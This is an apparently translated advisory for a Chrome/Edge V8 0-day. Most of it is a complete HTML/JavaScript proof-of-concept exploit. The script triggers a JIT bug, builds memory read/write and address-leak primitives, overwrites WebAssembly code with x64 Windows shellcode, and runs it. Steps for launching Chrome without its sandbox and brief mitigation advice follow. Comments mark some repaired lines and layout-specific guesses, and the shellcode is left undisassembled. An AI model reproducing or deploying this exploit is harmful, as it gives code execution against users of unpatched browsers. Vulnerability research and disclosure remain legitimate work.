Vulnerability description
Google Chrome is a free web browser developed by Google. As tested, this 0-day vulnerability affects the latest official version of Chrome (90.0.4430.72) and the official Chromium-based Microsoft Edge (89.0.774.77). An attacker can exploit it to obtain code execution in the browser's renderer process (where the V8 JavaScript engine runs) by constructing a crafted web page and luring the victim into visiting it. Note that the PoC below is demonstrated with the browser sandbox disabled (`-no-sandbox`); without a separate sandbox escape, which this page does not provide, the impact is confined to the sandboxed renderer.
Affected scope
Google Chrome <= 90.0.4430.72
Microsoft Edge based on Chromium kernel <= 89.0.774.77
Other Chromium/V8-based browsers (not tested in this write-up)
PoC
Links:Github.com/avboy1337/1…
The HTML file is as follows:
<script>
// Allocation-pressure helper intended to make V8 run garbage collection:
// it allocates a large number of short-lived, zero-length ArrayBuffers and
// discards them immediately. The loop count is the only knob; there is no
// return value.
function gc() {
  let remaining = 0x80000;
  while (remaining-- > 0) {
    new ArrayBuffer();
  }
}
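// Demo payload (x64 Windows). The listing on this page had its separators
// garbled ('.' instead of ','); they are restored here, byte for byte.
// The trailing bytes 0x6E 0x6F 0x74 0x65 0x70 0x61 0x64 0x2E 0x65 0x78 0x65 0x00
// spell "notepad.exe\0", so the visible effect of a successful run is Notepad
// starting. NOTE(review): the remainder of the payload is not disassembled on
// this page; treat it as opaque shellcode and do not run it outside a lab VM.
let shellcode = [
  0xFC, 0x48, 0x83, 0xE4, 0xF0, 0xE8, 0xC0, 0x00, 0x00, 0x00, 0x41, 0x51, 0x41, 0x50, 0x52, 0x51,
  0x56, 0x48, 0x31, 0xD2, 0x65, 0x48, 0x8B, 0x52, 0x60, 0x48, 0x8B, 0x52, 0x18, 0x48, 0x8B, 0x52,
  0x20, 0x48, 0x8B, 0x72, 0x50, 0x48, 0x0F, 0xB7, 0x4A, 0x4A, 0x4D, 0x31, 0xC9, 0x48, 0x31, 0xC0,
  0xAC, 0x3C, 0x61, 0x7C, 0x02, 0x2C, 0x20, 0x41, 0xC1, 0xC9, 0x0D, 0x41, 0x01, 0xC1, 0xE2, 0xED,
  0x52, 0x41, 0x51, 0x48, 0x8B, 0x52, 0x20, 0x8B, 0x42, 0x3C, 0x48, 0x01, 0xD0, 0x8B, 0x80, 0x88,
  0x00, 0x00, 0x00, 0x48, 0x85, 0xC0, 0x74, 0x67, 0x48, 0x01, 0xD0, 0x50, 0x8B, 0x48, 0x18, 0x44,
  0x8B, 0x40, 0x20, 0x49, 0x01, 0xD0, 0xE3, 0x56, 0x48, 0xFF, 0xC9, 0x41, 0x8B, 0x34, 0x88, 0x48,
  0x01, 0xD6, 0x4D, 0x31, 0xC9, 0x48, 0x31, 0xC0, 0xAC, 0x41, 0xC1, 0xC9, 0x0D, 0x41, 0x01, 0xC1,
  0x38, 0xE0, 0x75, 0xF1, 0x4C, 0x03, 0x4C, 0x24, 0x08, 0x45, 0x39, 0xD1, 0x75, 0xD8, 0x58, 0x44,
  0x8B, 0x40, 0x24, 0x49, 0x01, 0xD0, 0x66, 0x41, 0x8B, 0x0C, 0x48, 0x44, 0x8B, 0x40, 0x1C, 0x49,
  0x01, 0xD0, 0x41, 0x8B, 0x04, 0x88, 0x48, 0x01, 0xD0, 0x41, 0x58, 0x41, 0x58, 0x5E, 0x59, 0x5A,
  0x41, 0x58, 0x41, 0x59, 0x41, 0x5A, 0x48, 0x83, 0xEC, 0x20, 0x41, 0x52, 0xFF, 0xE0, 0x58, 0x41,
  0x59, 0x5A, 0x48, 0x8B, 0x12, 0xE9, 0x57, 0xFF, 0xFF, 0xFF, 0x5D, 0x48, 0xBA, 0x01, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8D, 0x8D, 0x01, 0x01, 0x00, 0x00, 0x41, 0xBA, 0x31, 0x8B,
  0x6F, 0x87, 0xFF, 0xD5, 0xBB, 0xF0, 0xB5, 0xA2, 0x56, 0x41, 0xBA, 0xA6, 0x95, 0xBD, 0x9D, 0xFF,
  0xD5, 0x48, 0x83, 0xC4, 0x28, 0x3C, 0x06, 0x7C, 0x0A, 0x80, 0xFB, 0xE0, 0x75, 0x05, 0xBB, 0x47,
  0x13, 0x72, 0x6F, 0x6A, 0x00, 0x59, 0x41, 0x89, 0xDA, 0xFF, 0xD5, 0x6E, 0x6F, 0x74, 0x65, 0x70,
  0x61, 0x64, 0x2E, 0x65, 0x78, 0x65, 0x00,
];

// Minimal WebAssembly module (separators restored as above). Sections, in
// order: type (one signature, () -> i32), function, table, memory, an empty
// global section, exports ("memory" and "main"), and a code section whose only
// body is `i32.const 42; end` (bytes 65, 42, 11). Its purpose here is to get a
// JIT-compiled code region the exploit can later locate and overwrite.
var wasmCode = new Uint8Array([
  0, 97, 115, 109, 1, 0, 0, 0,
  1, 133, 128, 128, 128, 0, 1, 96, 0, 1, 127,
  3, 130, 128, 128, 128, 0, 1, 0,
  4, 132, 128, 128, 128, 0, 1, 112, 0, 0,
  5, 131, 128, 128, 128, 0, 1, 0, 1,
  6, 129, 128, 128, 128, 0, 0,
  7, 145, 128, 128, 128, 0, 2, 6, 109, 101, 109, 111, 114, 121, 2, 0, 4, 109, 97, 105, 110, 0, 0,
  10, 138, 128, 128, 128, 0, 1, 132, 128, 128, 128, 0, 0, 65, 42, 11,
]);
var wasmModule = new WebAssembly.Module(wasmCode);
var wasmInstance = new WebAssembly.Instance(wasmModule);
// Exported function; untouched it returns 42. Calling it after its code has
// been overwritten is the final step of the exploit.
var main = wasmInstance.exports.main;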
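// Shared 8-byte scratch buffer used to reinterpret bit patterns between
// IEEE-754 doubles and 32-/64-bit integers. Every access is little-endian.
// (The listing on this page had `0.true` where `0, true` was meant; repaired.)
var bf = new ArrayBuffer(8);
var bfView = new DataView(bf);

/**
 * Low 32 bits of the bit pattern of the double `f`.
 * @param {number} f
 * @returns {number} unsigned 32-bit integer
 */
function fLow(f) {
  bfView.setFloat64(0, f, true);
  return bfView.getUint32(0, true);
}

/**
 * High 32 bits of the bit pattern of the double `f`.
 * @param {number} f
 * @returns {number} unsigned 32-bit integer
 */
function fHi(f) {
  bfView.setFloat64(0, f, true);
  return bfView.getUint32(4, true);
}

/**
 * Assemble a double from two 32-bit halves (inverse of fLow/fHi).
 * @param {number} low - low 32 bits
 * @param {number} hi - high 32 bits
 * @returns {number} the double whose bit pattern is hi:low
 */
function i2f(low, hi) {
  bfView.setUint32(0, low, true);
  bfView.setUint32(4, hi, true);
  return bfView.getFloat64(0, true);
}

/**
 * Full 64-bit pattern of the double `f` as a BigInt.
 * @param {number} f
 * @returns {bigint}
 */
function f2big(f) {
  bfView.setFloat64(0, f, true);
  return bfView.getBigUint64(0, true);
}

/**
 * Double whose 64-bit pattern is the BigInt `b` (inverse of f2big).
 * @param {bigint} b
 * @returns {number}
 */
function big2f(b) {
  bfView.setBigUint64(0, b, true);
  return bfView.getFloat64(0, true);
}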
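// ArrayBuffer subclass carrying one extra property, `slot`. The exploit later
// stores an object reference in `slot` and reads its raw bits back through a
// corrupted array (see leakObjLow), which is how it leaks addresses.
class LeakArrayBuffer extends ArrayBuffer {
  constructor(size) {
    super(size);
    this.slot = 0xb33f;
  }
}

/**
 * Trigger function for the bug. Returns [arr, local_arr, buff].
 *
 * With a === false: x = -1, Math.max(0, x, -1) is 0, so the array length is
 * Math.sign(0) = 0 and everything below is ordinary.
 * With a === true: x = 0xFFFFFFFF and the length argument evaluates to
 * Math.sign(-0xFFFFFFFF) = -1. An unoptimized (or patched) engine throws
 * RangeError at `new Array(-1)`. NOTE(review): the exploit evidently relies on
 * the JIT-compiled version of this function — it is warmed up 0x10000 times
 * before foo(true) is called — not rejecting that length; the mechanism is not
 * described on this page, so treat that as the author's claim.
 *
 * The comment after `local_arr[0] = 5.1` was garbled (`/ /`) in the listing
 * and made the script unparsable; it is repaired here.
 * @param {boolean} a - false for warm-up calls, true for the triggering call
 * @returns {[any[], any[], LeakArrayBuffer]}
 */
function foo(a) {
  let x = -1;
  if (a) x = 0xFFFFFFFF;
  var arr = new Array(Math.sign(0 - Math.max(0, x, -1)));
  arr.shift();
  let local_arr = Array(2);
  local_arr[0] = 5.1; // bit pattern 0x4014666666666666 (see fLow/fHi)
  let buff = new LeakArrayBuffer(0x1000); // byteLength idx=8
  arr[0] = 0x1122;
  return [arr, local_arr, buff];
}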
// Warm-up: call foo(false) enough times that V8 JIT-compiles it, then force
// garbage collection twice (see gc()) before the triggering call.
for (var i = 0; i < 0x10000; ++i)
foo(false);
gc(); gc();
// Triggering call. The three results are assigned to *undeclared* names, i.e.
// implicit globals (this is a sloppy-mode script); later code reads them as
// globals. NOTE(review): an unoptimized or patched engine throws RangeError
// inside foo(true) here, so nothing below runs in that case.
[corrput_arr, rwarr, corrupt_buff] = foo(true);
// Presumably an out-of-bounds write through the mis-sized `arr`, intended to
// land on the length field of local_arr (rwarr) so that rwarr becomes a large
// readable/writable window — the index 12 and value 0x22444 are specific to the
// heap layout of the targeted build; confirm before reuse.
corrput_arr[12] = 0x22444;
// Drop the global binding so the corrupted array is no longer reachable by name.
delete corrput_arr;
// Write a 64-bit value split across two 8-byte elements of the corrupted
// array: element 4 keeps its low half and takes `hi` as its high half,
// element 5 keeps its high half and takes `low` as its low half.
// NOTE(review): the function name says this targets the backing-store pointer
// of the ArrayBuffer that follows rwarr on the heap; indices 4 and 5 are
// layout-specific to the targeted V8 build — verify before reuse.
function setbackingStore(hi, low) {
  const keepLowOf4 = fLow(rwarr[4]);
  rwarr[4] = i2f(keepLowOf4, hi);
  const keepHiOf5 = fHi(rwarr[5]);
  rwarr[5] = i2f(low, keepHiOf5);
}
// Address-leak primitive: store `o` in the `slot` property of corrupt_buff,
// then read that property's raw bits back through the corrupted array
// (element 9) and return the low 32 bits minus one. NOTE(review): the `- 1`
// presumably strips a pointer tag bit and index 9 is layout-specific — confirm
// against the targeted build.
function leakObjLow(o) {
  corrupt_buff.slot = o;
  const rawLow = fLow(rwarr[9]);
  return rawLow - 1;
}
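// Final stage. Two lines of the listing were garbled (`= =0` and `8.true`)
// and made the script unparsable; they are repaired here with no other change.
let corrupt_view = new DataView(corrupt_buff);
// Low 32 bits of the address of corrupt_buff itself, via the leak primitive.
let corrupt_buffer_ptr_low = leakObjLow(corrupt_buff);
// Presumed address of rwarr's element 0 (0x10 below the buffer); layout-specific.
let idx0Addr = corrupt_buffer_ptr_low - 0x10;
// Round the upper 16 bits up to the next 0x40000 boundary.
let baseAddr = (corrupt_buffer_ptr_low & 0xffff0000) - ((corrupt_buffer_ptr_low & 0xffff0000) % 0x40000) + 0x40000;
// Byte distance from element 0 to baseAddr + 0x1c; read that 32-bit word
// through rwarr, picking the low or high half of the 8-byte element depending
// on alignment. NOTE(review): what lives at baseAddr + 0x1c is not stated on
// this page — presumably a field holding the high half of heap addresses.
let delta = baseAddr + 0x1c - idx0Addr;
// `this` at the top level of a classic script is the global object, so this
// stores a global named `base`.
if ((delta % 8) === 0) {
  let baseIdx = delta / 8;
  this.base = fLow(rwarr[baseIdx]);
} else {
  let baseIdx = ((delta - (delta % 8)) / 8);
  this.base = fHi(rwarr[baseIdx]);
}
// Point the buffer's backing store at the WebAssembly instance object and read
// a 64-bit field from it (offset 13 * 8), which the exploit treats as the code
// entry address of the instance.
let wasmInsAddr = leakObjLow(wasmInstance);
setbackingStore(wasmInsAddr, this.base);
let code_entry = corrupt_view.getFloat64(13 * 8, true);
// Redirect the backing store again, this time at that code address, so that
// every write through corrupt_view lands in the wasm code region.
setbackingStore(fLow(code_entry), fHi(code_entry));
for (let i = 0; i < shellcode.length; i++) {
  corrupt_view.setUint8(i, shellcode[i]);
}
// Execute whatever now sits at the wasm entry — the shellcode written above.
main();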
</script>
steps
Run the following command in CMD — it launches Chrome with the renderer sandbox disabled — and then open the HTML file in that browser instance. The `-no-sandbox` flag is required for this PoC as published: it contains no sandbox escape (see the note in the mitigation section), so a default, sandboxed Chrome will not be fully compromised by this page alone. Only do this on an isolated lab VM.
"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" -no-sandbox
Note: this is the default installation path; adjust it if Chrome is installed elsewhere.
Reproduction demo
The video demonstration is available on the author's official account.
Mitigation advice
At the time of writing, Google has not released a fix for this vulnerability, so it is still a 0-day. Users are advised to be cautious about clicking suspicious URLs and about handling suspicious emails and attachments, especially during realistic attack-and-defense exercises, where attackers are likely to use this vulnerability against the defending side. Note that the PoC above is run with the sandbox disabled (`-no-sandbox`): keeping the default sandbox enabled and applying the vendor update as soon as it ships are the primary mitigations. Use Firefox when possible.
There are unconfirmed reports that this vulnerability, chained with other vulnerabilities, can bypass the browser sandbox; the method has not been disclosed. Users should nevertheless remain vigilant and treat the sandbox as a mitigation, not a guarantee.
Reference links:
Mp.weixin.qq.com/s/gVBsX62O3…
Mp.weixin.qq.com/s/G-ffg_TDR…
Baijiahao.baidu.com/s?id=169699…